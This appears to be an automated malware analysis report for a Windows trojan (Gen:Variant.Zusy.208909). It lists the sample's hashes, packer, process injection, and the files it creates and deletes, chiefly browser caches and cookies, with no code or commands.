Gen.Variant.Zusy.208909_86ae566339

by malwarelabrobot on November 23rd, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.208909 (B) (Emsisoft), Gen:Variant.Zusy.208909 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 86ae56633941c20e9a65a719b5a23208
SHA1: 230b6f0d9e33824cb8e5982e93117e740dbff1d0
SHA256: c301533198b01066be1ad7d5be88d011dd9dcdaefb3136e9db4e89d2d6a283ca
SSDeep: 24576:lhXyIPRL1bubRxgh5XjFmTNTOUOM8 SIsLve5vDv5EPNV3t:lh9Js4zsTccynrehkb3
Size: 1024496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 05:44:39
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3884

The Trojan injects its code into the following process(es):

86ae56633941c20e9a65a719b5a2208.exe:2388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 86ae56633941c20e9a65a719b5a2208.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\20ed6a\CDClient_EX.sys (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Windows\YbfHFk\iAFqcX.dll (15859 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\xEQSlj.dll (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Windows\hlog.txt (981 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Windows\System32\20ed6a\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
